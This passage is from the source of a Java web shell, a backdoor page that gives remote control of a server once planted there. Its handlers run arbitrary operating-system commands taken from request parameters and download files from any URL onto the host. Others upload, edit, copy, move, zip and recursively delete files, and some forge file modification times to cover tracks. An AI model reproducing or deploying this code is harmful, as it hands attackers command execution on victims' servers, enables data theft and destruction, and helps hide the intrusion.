1877. }
1878. out
1879. .println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"
1880. + " <td>");
1881. if (enter != null)
1882. out
1883. .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>");
1884. else
1885. out
1886. .println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>");
1887. out.println("</td>" + " <td colspan=\"4\" align=\"right\">"
1888. + dircount + " directories / " + filecount
1889. + " files</td></tr>" + "</table>");
1890. out.println("</div>");
1891. if (file instanceof EnterFile)
1892. ((EnterFile) file).close();
1893. } catch (ZipException e) {
1894. JSession.setAttribute(MSG, "\""
1895. + JSession.getAttribute(ENTER).toString()
1896. + "\" Is Not a Zip File. Please Exit.");
1897. throw e;
1898. } catch (Exception e) {
1899. JSession.setAttribute(MSG,
1900. "File Does Not Exist Or You Dont Have Privilege."
1901. + BACK_HREF);
1902. throw e;
1903. }
1904. }
1905. }
1906.  
1907. private static class LogoutInvoker extends DefaultInvoker {
1908. public boolean doBefore() {
1909. return false;
1910. }
1911.  
1912. public boolean doAfter() {
1913. return false;
1914. }
1915.  
1916. public void invoke(HttpServletRequest request,
1917. HttpServletResponse response, HttpSession JSession)
1918. throws Exception {
1919. try {
1920. Object dbo = JSession.getAttribute(DBO);
1921. if (dbo != null)
1922. ((DBOperator) dbo).close();
1923. Object obj = JSession.getAttribute(PORT_MAP);
1924. if (obj != null) {
1925. ServerSocket s = (ServerSocket) obj;
1926. s.close();
1927. }
1928. Object online = JSession.getAttribute(SHELL_ONLINE);
1929. if (online != null)
1930. ((OnLineProcess) online).stop();
1931. JSession.invalidate();
1932. ((Invoker) ins.get("vLogin")).invoke(request, response,
1933. JSession);
1934. } catch (ClassCastException e) {
1935. JSession.invalidate();
1936. ((Invoker) ins.get("vLogin")).invoke(request, response,
1937. JSession);
1938. } catch (Exception e) {
1939.  
1940. throw e;
1941. }
1942. }
1943. }
1944.  
1945. private static class UploadInvoker extends DefaultInvoker {
1946. public boolean doBefore() {
1947. return false;
1948. }
1949.  
1950. public boolean doAfter() {
1951. return false;
1952. }
1953.  
1954. public void invoke(HttpServletRequest request,
1955. HttpServletResponse response, HttpSession JSession)
1956. throws Exception {
1957. try {
1958. UploadBean fileBean = new UploadBean();
1959. response.getWriter().println(
1960. JSession.getAttribute(CURRENT_DIR).toString());
1961. fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR)
1962. .toString());
1963. fileBean.parseRequest(request);
1964. File f = new File(JSession.getAttribute(CURRENT_DIR) + "/"
1965. + fileBean.getFileName());
1966. if (f.exists() && f.length() > 0)
1967. JSession
1968. .setAttribute(MSG,
1969. "<span style='color:green'>Upload File Success!</span>");
1970. else
1971. JSession
1972. .setAttribute("MSG",
1973. "<span style='color:red'>Upload File Failed!</span>");
1974. response.sendRedirect(SHELL_NAME);
1975. } catch (Exception e) {
1976. throw e;
1977. }
1978. }
1979. }
1980.  
1981. private static class CopyInvoker extends DefaultInvoker {
1982. public void invoke(HttpServletRequest request,
1983. HttpServletResponse response, HttpSession JSession)
1984. throws Exception {
1985. try {
1986. String src = request.getParameter("src");
1987. String to = request.getParameter("to");
1988. InputStream in = null;
1989. Object enter = JSession.getAttribute(ENTER);
1990. if (enter == null)
1991. in = new FileInputStream(new File(src));
1992. else {
1993. ZipFile zf = new ZipFile((String) enter);
1994. ZipEntry entry = zf.getEntry(src);
1995. in = zf.getInputStream(entry);
1996. }
1997. BufferedInputStream input = new BufferedInputStream(in);
1998. BufferedOutputStream output = new BufferedOutputStream(
1999. new FileOutputStream(new File(to)));
2000. byte[] d = new byte[1024];
2001. int len = input.read(d);
2002. while (len != -1) {
2003. output.write(d, 0, len);
2004. len = input.read(d);
2005. }
2006. output.close();
2007. input.close();
2008. JSession.setAttribute(MSG, "Copy File Success!");
2009. response.sendRedirect(SHELL_NAME);
2010. } catch (Exception e) {
2011.  
2012. throw e;
2013. }
2014. }
2015. }
2016.  
2017. private static class BottomInvoker extends DefaultInvoker {
2018. public boolean doBefore() {
2019. return false;
2020. }
2021.  
2022. public boolean doAfter() {
2023. return false;
2024. }
2025.  
2026. public void invoke(HttpServletRequest request,
2027. HttpServletResponse response, HttpSession JSession)
2028. throws Exception {
2029. try {
2030. response
2031. .getWriter()
2032. .println(
2033. "<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Don't break my heart~"
2034. + "</div>");
2035. } catch (Exception e) {
2036.  
2037. throw e;
2038. }
2039. }
2040. }
2041.  
2042. private static class VCreateFileInvoker extends DefaultInvoker {
2043. public void invoke(HttpServletRequest request,
2044. HttpServletResponse response, HttpSession JSession)
2045. throws Exception {
2046. try {
2047. PrintWriter out = response.getWriter();
2048. String path = request.getParameter("filepath");
2049. File f = new File(path);
2050. if (!f.isAbsolute()) {
2051. String oldPath = path;
2052. path = JSession.getAttribute(CURRENT_DIR).toString();
2053. if (!path.endsWith("/"))
2054. path += "/";
2055. path += oldPath;
2056. f = new File(path);
2057. f.createNewFile();
2058. } else {
2059. f.createNewFile();
2060. }
2061. out
2062. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2063. + "<form name=\"form1\" id=\"form1\" action=\""
2064. + SHELL_NAME
2065. + "\" method=\"post\" >"
2066. + "<h2>Create / Edit File &raquo;</h2>"
2067. + "<input type='hidden' name='o' value='createFile'>"
2068. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2069. + path
2070. + "\" type=\"text\" size=\"100\" />"
2071. + " <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>"
2072. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"
2073. + "<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2074. + "</form>" + "</td></tr></table>");
2075. } catch (Exception e) {
2076.  
2077. throw e;
2078. }
2079. }
2080. }
2081.  
2082. private static class VEditInvoker extends DefaultInvoker {
2083. public void invoke(HttpServletRequest request,
2084. HttpServletResponse response, HttpSession JSession)
2085. throws Exception {
2086. try {
2087. PrintWriter out = response.getWriter();
2088. String path = request.getParameter("filepath");
2089. String charset = request.getParameter("charset");
2090. Object enter = JSession.getAttribute(ENTER);
2091. InputStream input = null;
2092. if (enter != null) {
2093. ZipFile zf = new ZipFile((String) enter);
2094. ZipEntry entry = new ZipEntry(path);
2095. input = zf.getInputStream(entry);
2096. } else {
2097. File f = new File(path);
2098. if (!f.exists())
2099. return;
2100. input = new FileInputStream(path);
2101. }
2102.  
2103. BufferedReader reader = null;
2104. if (Util.isEmpty(charset) || charset.equals("ANSI"))
2105. reader = new BufferedReader(new InputStreamReader(input));
2106. else
2107. reader = new BufferedReader(new InputStreamReader(input,
2108. charset));
2109. StringBuffer content = new StringBuffer();
2110. String s = reader.readLine();
2111. while (s != null) {
2112. content.append(s + "\r\n");
2113. s = reader.readLine();
2114. }
2115. reader.close();
2116. out
2117. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2118. + "<form name=\"form1\" id=\"form1\" action=\""
2119. + SHELL_NAME
2120. + "\" method=\"post\" >"
2121. + "<h2>Create / Edit File &raquo;</h2>"
2122. + "<input type='hidden' name='o' value='createFile'>"
2123. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2124. + path
2125. + "\" type=\"text\" size=\"100\" />"
2126. + " <select name='charset' id='fcharset' onchange=\"new fso({path:'"
2127. + path
2128. + "',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option "
2129. + ((!Util.isEmpty(charset) && charset
2130. .equals("UTF-8")) ? "selected" : "")
2131. + " value='UTF-8'>UTF-8</option></select></p>"
2132. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"
2133. + Util.htmlEncode(content.toString())
2134. + "</textarea></p>" + "<p>");
2135. if (enter != null)
2136. out
2137. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">");
2138. else
2139. out
2140. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">");
2141. out
2142. .println("<input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2143. + "</form>" + "</td></tr></table>");
2144.  
2145. } catch (Exception e) {
2146.  
2147. throw e;
2148. }
2149. }
2150. }
2151.  
2152. private static class CreateFileInvoker extends DefaultInvoker {
2153. public boolean doBefore() {
2154. return false;
2155. }
2156.  
2157. public boolean doAfter() {
2158. return false;
2159. }
2160.  
2161. public void invoke(HttpServletRequest request,
2162. HttpServletResponse response, HttpSession JSession)
2163. throws Exception {
2164. try {
2165. PrintWriter out = response.getWriter();
2166. String path = request.getParameter("filepath");
2167. String content = request.getParameter("filecontent");
2168. String charset = request.getParameter("charset");
2169. BufferedWriter outs = null;
2170. if (charset.equals("ANSI"))
2171. outs = new BufferedWriter(new FileWriter(new File(path)));
2172. else
2173. outs = new BufferedWriter(new OutputStreamWriter(
2174. new FileOutputStream(new File(path)), charset));
2175. outs.write(content, 0, content.length());
2176. outs.close();
2177. JSession
2178. .setAttribute(
2179. MSG,
2180. "Save File <span style='color:green'>"
2181. + (new File(path)).getName()
2182. + "</span> With <span style='font-weight:bold;color:red'>"
2183. + charset + "</span> Success!");
2184. response.sendRedirect(SHELL_NAME);
2185. } catch (Exception e) {
2186.  
2187. throw e;
2188. }
2189. }
2190. }
2191.  
2192.  
2193.  
2194. private static class VEditPropertyInvoker extends DefaultInvoker {
2195. public void invoke(HttpServletRequest request,
2196. HttpServletResponse response, HttpSession JSession)
2197. throws Exception {
2198. try {
2199. PrintWriter out = response.getWriter();
2200. String filepath = request.getParameter("filepath");
2201. File f = new File(filepath);
2202. if (!f.exists())
2203. return;
2204. String read = f.canRead() ? "checked=\"checked\"" : "";
2205. String write = f.canWrite() ? "checked=\"checked\"" : "";
2206. Calendar cal = Calendar.getInstance();
2207. cal.setTimeInMillis(f.lastModified());
2208.  
2209. out
2210. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2211. + "<form name=\"form1\" id=\"form1\" action=\""
2212. + SHELL_NAME
2213. + "\" method=\"post\" >"
2214. + "<h2>Set File Property &raquo;</h2>"
2215. + "<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""
2216. + request.getParameter("filepath")
2217. + "\" type=\"text\" size=\"120\" /></p>"
2218. + "<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "
2219. + "<p>"
2220. + " <input type=\"checkbox\" disabled "
2221. + read
2222. + " name=\"read\" id=\"checkbox\">Read "
2223. + " <input type=\"checkbox\" disabled "
2224. + write
2225. + " name=\"write\" id=\"checkbox2\">Write "
2226. + "</p>"
2227. + "<p>Instead &raquo;"
2228. + "year:"
2229. + "<input class=\"input\" name=\"year\" value="
2230. + cal.get(Calendar.YEAR)
2231. + " id=\"year\" type=\"text\" size=\"4\" />"
2232. + "month:"
2233. + "<input class=\"input\" name=\"month\" value="
2234. + (cal.get(Calendar.MONTH) + 1)
2235. + " id=\"month\" type=\"text\" size=\"2\" />"
2236. + "day:"
2237. + "<input class=\"input\" name=\"date\" value="
2238. + cal.get(Calendar.DATE)
2239. + " id=\"date\" type=\"text\" size=\"2\" />"
2240. + ""
2241. + "hour:"
2242. + "<input class=\"input\" name=\"hour\" value="
2243. + cal.get(Calendar.HOUR)
2244. + " id=\"hour\" type=\"text\" size=\"2\" />"
2245. + "minute:"
2246. + "<input class=\"input\" name=\"minute\" value="
2247. + cal.get(Calendar.MINUTE)
2248. + " id=\"minute\" type=\"text\" size=\"2\" />"
2249. + "second:"
2250. + "<input class=\"input\" name=\"second\" value="
2251. + cal.get(Calendar.SECOND)
2252. + " id=\"second\" type=\"text\" size=\"2\" />"
2253. + "</p>"
2254. + "<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"
2255. + "</form>" + "</td></tr></table>");
2256. } catch (Exception e) {
2257. throw e;
2258. }
2259. }
2260. }
2261.  
2262. private static class EditPropertyInvoker extends DefaultInvoker {
2263. public boolean doBefore() {
2264. return false;
2265. }
2266.  
2267. public boolean doAfter() {
2268. return false;
2269. }
2270.  
2271. public void invoke(HttpServletRequest request,
2272. HttpServletResponse response, HttpSession JSession)
2273. throws Exception {
2274. try {
2275. String f = request.getParameter("file");
2276. File file = new File(f);
2277. if (!file.exists())
2278. return;
2279.  
2280. String year = request.getParameter("year");
2281. String month = request.getParameter("month");
2282. String date = request.getParameter("date");
2283. String hour = request.getParameter("hour");
2284. String minute = request.getParameter("minute");
2285. String second = request.getParameter("second");
2286.  
2287. Calendar cal = Calendar.getInstance();
2288. cal.set(Calendar.YEAR, Integer.parseInt(year));
2289. cal.set(Calendar.MONTH, Integer.parseInt(month) - 1);
2290. cal.set(Calendar.DATE, Integer.parseInt(date));
2291. cal.set(Calendar.HOUR, Integer.parseInt(hour));
2292. cal.set(Calendar.MINUTE, Integer.parseInt(minute));
2293. cal.set(Calendar.SECOND, Integer.parseInt(second));
2294. if (file.setLastModified(cal.getTimeInMillis())) {
2295. JSession.setAttribute(MSG, "Reset File Property Success!");
2296. } else {
2297. JSession
2298. .setAttribute(MSG,
2299. "<span style='color:red'>Reset File Property Failed!</span>");
2300. }
2301. response.sendRedirect(SHELL_NAME);
2302. } catch (Exception e) {
2303.  
2304. throw e;
2305. }
2306. }
2307. }
2308.  
2309. //VShell
2310. private static class VsInvoker extends DefaultInvoker {
2311. public void invoke(HttpServletRequest request,
2312. HttpServletResponse response, HttpSession JSession)
2313. throws Exception {
2314. try {
2315. PrintWriter out = response.getWriter();
2316. String cmd = request.getParameter("command");
2317. String program = request.getParameter("program");
2318. if (cmd == null) {
2319. if (ISLINUX)
2320. cmd = "id";
2321. else
2322. cmd = "cmd.exe /c set";
2323. }
2324. if (program == null)
2325. program = "cmd.exe /c net start > " + SHELL_DIR
2326. + "/Log.txt";
2327. if (JSession.getAttribute(MSG) != null) {
2328. Util.outMsg(out, JSession.getAttribute(MSG).toString());
2329. JSession.removeAttribute(MSG);
2330. }
2331. out
2332. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2333. + "<form name=\"form1\" id=\"form1\" action=\""
2334. + SHELL_NAME
2335. + "\" method=\"post\" >"
2336. + "<h2>Execute Program &raquo;</h2>"
2337. + "<p>"
2338. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2339. + "<input type=\"hidden\" name=\"type\" value=\"program\">"
2340. + "Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""
2341. + program
2342. + "\" type=\"text\" size=\"100\" />"
2343. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2344. + "</p>"
2345. + "</form>"
2346. + "<form name=\"form1\" id=\"form1\" action=\""
2347. + SHELL_NAME
2348. + "\" method=\"post\" >"
2349. + "<h2>Execute Shell &raquo;</h2>"
2350. + "<p>"
2351. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2352. + "<input type=\"hidden\" name=\"type\" value=\"command\">"
2353. + "Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""
2354. + cmd
2355. + "\" type=\"text\" size=\"100\" />"
2356. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2357. + "</p>"
2358. + "</form>"
2359. + "</td>"
2360. + "</tr></table>");
2361. } catch (Exception e) {
2362.  
2363. throw e;
2364. }
2365. }
2366. }
2367.  
2368. private static class ShellInvoker extends DefaultInvoker {
2369. public void invoke(HttpServletRequest request,
2370. HttpServletResponse response, HttpSession JSession)
2371. throws Exception {
2372. try {
2373. PrintWriter out = response.getWriter();
2374. String type = request.getParameter("type");
2375. if (type.equals("command")) {
2376. ((Invoker) ins.get("vs")).invoke(request, response,
2377. JSession);
2378. out.println("<div style='margin:10px'><hr/>");
2379. out.println("<pre>");
2380. String command = request.getParameter("command");
2381. if (!Util.isEmpty(command)) {
2382. Process pro = Runtime.getRuntime().exec(command);
2383. BufferedReader reader = new BufferedReader(
2384. new InputStreamReader(pro.getInputStream()));
2385. String s = reader.readLine();
2386. while (s != null) {
2387. out.println(Util.htmlEncode(Util.getStr(s)));
2388. s = reader.readLine();
2389. }
2390. reader.close();
2391. reader = new BufferedReader(new InputStreamReader(pro
2392. .getErrorStream()));
2393. s = reader.readLine();
2394. while (s != null) {
2395. out.println(Util.htmlEncode(Util.getStr(s)));
2396. s = reader.readLine();
2397. }
2398. reader.close();
2399. out.println("</pre></div>");
2400. }
2401. } else {
2402. String program = request.getParameter("program");
2403. if (!Util.isEmpty(program)) {
2404. Process pro = Runtime.getRuntime().exec(program);
2405. JSession.setAttribute(MSG, "Program Has Run Success!");
2406. ((Invoker) ins.get("vs")).invoke(request, response,
2407. JSession);
2408. }
2409. }
2410. } catch (Exception e) {
2411.  
2412. throw e;
2413. }
2414. }
2415. }
2416.  
2417. private static class DownInvoker extends DefaultInvoker {
2418. public boolean doBefore() {
2419. return false;
2420. }
2421.  
2422. public boolean doAfter() {
2423. return false;
2424. }
2425.  
2426. public void invoke(HttpServletRequest request,
2427. HttpServletResponse response, HttpSession JSession)
2428. throws Exception {
2429. try {
2430. String path = request.getParameter("path");
2431. if (Util.isEmpty(path))
2432. return;
2433. InputStream i = null;
2434. Object enter = JSession.getAttribute(ENTER);
2435. String fileName = null;
2436. if (enter == null) {
2437. File f = new File(path);
2438. if (!f.exists())
2439. return;
2440. fileName = f.getName();
2441. i = new FileInputStream(f);
2442. } else {
2443. ZipFile zf = new ZipFile((String) enter);
2444. ZipEntry entry = new ZipEntry(path);
2445. fileName = entry.getName().substring(
2446. entry.getName().lastIndexOf("/") + 1);
2447. i = zf.getInputStream(entry);
2448. }
2449. response.setHeader("Content-Disposition",
2450. "attachment;filename="
2451. + URLEncoder.encode(fileName, PAGE_CHARSET));
2452. BufferedInputStream input = new BufferedInputStream(i);
2453. BufferedOutputStream output = new BufferedOutputStream(response
2454. .getOutputStream());
2455. byte[] data = new byte[1024];
2456. int len = input.read(data);
2457. while (len != -1) {
2458. output.write(data, 0, len);
2459. len = input.read(data);
2460. }
2461. input.close();
2462. output.close();
2463. } catch (Exception e) {
2464.  
2465. throw e;
2466. }
2467. }
2468. }
2469.  
2470. //VDown
2471. private static class VdInvoker extends DefaultInvoker {
2472. public void invoke(HttpServletRequest request,
2473. HttpServletResponse response, HttpSession JSession)
2474. throws Exception {
2475. try {
2476. PrintWriter out = response.getWriter();
2477. String savepath = request.getParameter("savepath");
2478. String url = request.getParameter("url");
2479. if (Util.isEmpty(url))
2480. url = "http://www.baidu.com/";
2481. if (Util.isEmpty(savepath)) {
2482. savepath = JSession.getAttribute(CURRENT_DIR).toString();
2483. }
2484. if (!Util.isEmpty(JSession.getAttribute("done"))) {
2485. Util.outMsg(out, "Download Remote File Success!");
2486. JSession.removeAttribute("done");
2487. }
2488. out
2489. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2490. + "<form name=\"form1\" id=\"form1\" action=\""
2491. + SHELL_NAME
2492. + "\" method=\"post\" >"
2493. + "<h2>Remote File DownLoad &raquo;</h2>"
2494. + "<p>"
2495. + "<input type=\"hidden\" name=\"o\" value=\"downRemote\">"
2496. + "<p>File&nbsp;&nbsp;&nbsp;URL: "
2497. + " <input class=\"input\" name=\"url\" value=\""
2498. + url
2499. + "\" id=\"url\" type=\"text\" size=\"200\" /></p>"
2500. + "<p>Save Path: "
2501. + "<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""
2502. + savepath
2503. + "\" type=\"text\" size=\"200\" /></p>"
2504. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />"
2505. + "</p>" + "</form></table>");
2506. } catch (Exception e) {
2507.  
2508. throw e;
2509. }
2510. }
2511. }
2512.  
2513. private static class DownRemoteInvoker extends DefaultInvoker {
2514. public boolean doBefore() {
2515. return true;
2516. }
2517.  
2518. public boolean doAfter() {
2519. return true;
2520. }
2521.  
2522. public void invoke(HttpServletRequest request,
2523. HttpServletResponse response, HttpSession JSession)
2524. throws Exception {
2525. try {
2526. String downFileUrl = request.getParameter("url");
2527. String savePath = request.getParameter("savepath");
2528. if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
2529. return;
2530. URL downUrl = new URL(downFileUrl);
2531. URLConnection conn = downUrl.openConnection();
2532.  
2533. File tempF = new File(savePath);
2534. File saveF = tempF;
2535. if (tempF.isDirectory()) {
2536. String fName = downFileUrl.substring(downFileUrl
2537. .lastIndexOf("/") + 1);
2538. saveF = new File(tempF, fName);
2539. }
2540. BufferedInputStream in = new BufferedInputStream(conn
2541. .getInputStream());
2542. BufferedOutputStream out = new BufferedOutputStream(
2543. new FileOutputStream(saveF));
2544. byte[] data = new byte[1024];
2545. int len = in.read(data);
2546. while (len != -1) {
2547. out.write(data, 0, len);
2548. len = in.read(data);
2549. }
2550. in.close();
2551. out.close();
2552. JSession.setAttribute("done", "d");
2553. ((Invoker) ins.get("vd")).invoke(request, response, JSession);
2554. } catch (Exception e) {
2555.  
2556. throw e;
2557. }
2558. }
2559. }
2560.  
2561. private static class IndexInvoker extends DefaultInvoker {
2562. public void invoke(HttpServletRequest request,
2563. HttpServletResponse response, HttpSession JSession)
2564. throws Exception {
2565. try {
2566. ((Invoker) ins.get("filelist")).invoke(request, response,
2567. JSession);
2568. } catch (Exception e) {
2569.  
2570. throw e;
2571. }
2572. }
2573. }
2574.  
2575. private static class MkDirInvoker extends DefaultInvoker {
2576. public boolean doBefore() {
2577. return false;
2578. }
2579.  
2580. public boolean doAfter() {
2581. return false;
2582. }
2583.  
2584. public void invoke(HttpServletRequest request,
2585. HttpServletResponse response, HttpSession JSession)
2586. throws Exception {
2587. try {
2588. String name = request.getParameter("name");
2589. File f = new File(name);
2590. if (!f.isAbsolute()) {
2591. String path = JSession.getAttribute(CURRENT_DIR).toString();
2592. if (!path.endsWith("/"))
2593. path += "/";
2594. path += name;
2595. f = new File(path);
2596. }
2597. f.mkdirs();
2598. JSession.setAttribute(MSG, "Make Directory Success!");
2599. response.sendRedirect(SHELL_NAME);
2600. } catch (Exception e) {
2601.  
2602. throw e;
2603. }
2604. }
2605. }
2606.  
2607. private static class MoveInvoker extends DefaultInvoker {
2608. public boolean doBefore() {
2609. return false;
2610. }
2611.  
2612. public boolean doAfter() {
2613. return false;
2614. }
2615.  
2616. public void invoke(HttpServletRequest request,
2617. HttpServletResponse response, HttpSession JSession)
2618. throws Exception {
2619. try {
2620. PrintWriter out = response.getWriter();
2621. String src = request.getParameter("src");
2622. String target = request.getParameter("to");
2623. if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
2624. File file = new File(src);
2625. if (file.renameTo(new File(target))) {
2626. JSession.setAttribute(MSG, "Move File Success!");
2627. } else {
2628. String msg = "Move File Failed!";
2629. if (file.isDirectory()) {
2630. msg += "The Move Will Failed When The Directory Is Not Empty.";
2631. }
2632. JSession.setAttribute(MSG, msg);
2633. }
2634. response.sendRedirect(SHELL_NAME);
2635. }
2636. } catch (Exception e) {
2637.  
2638. throw e;
2639. }
2640. }
2641. }
2642.  
2643. private static class RemoveDirInvoker extends DefaultInvoker {
2644. public boolean doBefore() {
2645. return false;
2646. }
2647.  
2648. public boolean doAfter() {
2649. return false;
2650. }
2651.  
2652. public void invoke(HttpServletRequest request,
2653. HttpServletResponse response, HttpSession JSession)
2654. throws Exception {
2655. try {
2656. String dir = request.getParameter("dir");
2657. File file = new File(dir);
2658. if (file.exists()) {
2659. deleteFile(file);
2660. deleteDir(file);
2661. }
2662.  
2663. JSession.setAttribute(MSG, "Remove Directory Success!");
2664. response.sendRedirect(SHELL_NAME);
2665. } catch (Exception e) {
2666.  
2667. throw e;
2668. }
2669. }
2670.  
2671. public void deleteFile(File f) {
2672. if (f.isFile()) {
2673. f.delete();
2674. } else {
2675. File[] list = f.listFiles();
2676. for (int i = 0; i < list.length; i++) {
2677. File ff = list[i];
2678. deleteFile(ff);
2679. }
2680. }
2681. }
2682.  
2683. public void deleteDir(File f) {
2684. File[] list = f.listFiles();
2685. if (list.length == 0) {
2686. f.delete();
2687. } else {
2688. for (int i = 0; i < list.length; i++) {
2689. File ff = list[i];
2690. deleteDir(ff);
2691. }
2692. deleteDir(f);
2693. }
2694. }
2695. }
2696.  
2697. private static class PackBatchInvoker extends DefaultInvoker {
2698. public boolean doBefore() {
2699. return false;
2700. }
2701.  
2702. public boolean doAfter() {
2703. return false;
2704. }
2705.  
2706. public void invoke(HttpServletRequest request,
2707. HttpServletResponse response, HttpSession JSession)
2708. throws Exception {
2709. try {
2710. String files = request.getParameter("files");
2711. if (Util.isEmpty(files))
2712. return;
2713. String saveFileName = request.getParameter("savefilename");
2714. File saveF = new File(JSession.getAttribute(CURRENT_DIR)
2715. .toString(), saveFileName);
2716. if (saveF.exists()) {
2717. JSession.setAttribute(MSG, "The File \"" + saveFileName
2718. + "\" Has Been Exists!");
2719. response.sendRedirect(SHELL_NAME);
2720. return;
2721. }
2722. ZipOutputStream zout = new ZipOutputStream(
2723. new BufferedOutputStream(new FileOutputStream(saveF)));
2724. String[] arr = files.split(",");
2725. for (int i = 0; i < arr.length; i++) {
2726. String f = arr[i];
2727. File pF = new File(JSession.getAttribute(CURRENT_DIR)
2728. .toString(), f);
2729. ZipEntry entry = new ZipEntry(pF.getName());
2730. zout.putNextEntry(entry);
2731. FileInputStream fInput = new FileInputStream(pF);
2732. int len = 0;
2733. byte[] buf = new byte[1024];
2734. while ((len = fInput.read(buf)) != -1) {
2735. zout.write(buf, 0, len);
2736. zout.flush();
2737. }
2738. fInput.close();
2739. }
2740. zout.close();
2741. JSession.setAttribute(MSG, "Pack Files Success!");
2742. response.sendRedirect(SHELL_NAME);
2743. } catch (Exception e) {
2744.  
2745. throw e;
2746. }
2747. }
2748. }
2749.  
2750. private static class VPackConfigInvoker extends DefaultInvoker {
2751. public void invoke(HttpServletRequest request,
2752. HttpServletResponse response, HttpSession JSession)
2753. throws Exception {
2754. try {
2755. PrintWriter out = response.getWriter();
2756. String packfile = request.getParameter("packedfile");
2757. String currentd = JSession.getAttribute(CURRENT_DIR).toString();
2758. out
2759. .println("<form action='"
2760. + SHELL_NAME
2761. + "' method='post'>"
2762. + "<input type='hidden' name='o' value='pack'/>"
2763. + "<input type='hidden' name='config' value='true'/>"
2764. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
2765. + " <tr>"
2766. + " <td><h2 id=\"Bin_H2_Title\">Pack Configuration &gt;&gt;<hr/></h2>"
2767. + " <div id=\"hOWTm\">"
2768. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
2769. + " <tr align=\"center\">"
2770. + " <td style=\"width:5%\"></td>"
2771. + " <td align=\"center\"><table border=\"0\">"
2772. + " <tr>"
2773. + " <td>Packed Dir</td>"
2774. + " <td><input type=\"text\" name=\"packedfile\" size='100' value=\""
2775. + packfile
2776. + "\" class=\"input\"/></td>"
2777. + " </tr>"
2778. + " <tr>"
2779. + " <td>Save To</td>"
2780. + " <td><input type=\"text\" name=\"savefilename\" size='100' value=\""
2781. + ((currentd.endsWith("/") ? currentd
2782. : currentd + "/") + "pack.zip")
2783. + "\" class=\"input\"/></td>"
2784. + " </tr>"
2785. + " <tr>"
2786. + " <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>"
2787. + " <input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist"
2788. + " <hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>"
2789. + " </fieldset></td>"
2790. + " </tr>"
2791. + " <tr>"
2792. + " <td>Filesize Filter</td>"
2793. + " <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) "
2794. + " <input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>"
2795. + " </tr>"
2796. + " <tr>"
2797. + " <td>Exclude Dir</td>"
2798. + " <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>"
2799. + " </tr>"
2800. + " </table></td>"
2801. + " </tr>"
2802. + " <tr align=\"center\">"
2803. + " <td colspan=\"2\">"
2804. + " <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />"
2805. + " </td>" + " </tr>"
2806. + " </table>" + " </div></td>"
2807. + " </tr>" + " </table></form>");
2808. } catch (Exception e) {
2809.  
2810. throw e;
2811. }
2812. }
2813. }
2814.  
2815. private static class PackInvoker extends DefaultInvoker {
2816. public boolean doBefore() {
2817. return false;
2818. }
2819.  
2820. public boolean doAfter() {
2821. return false;
2822. }
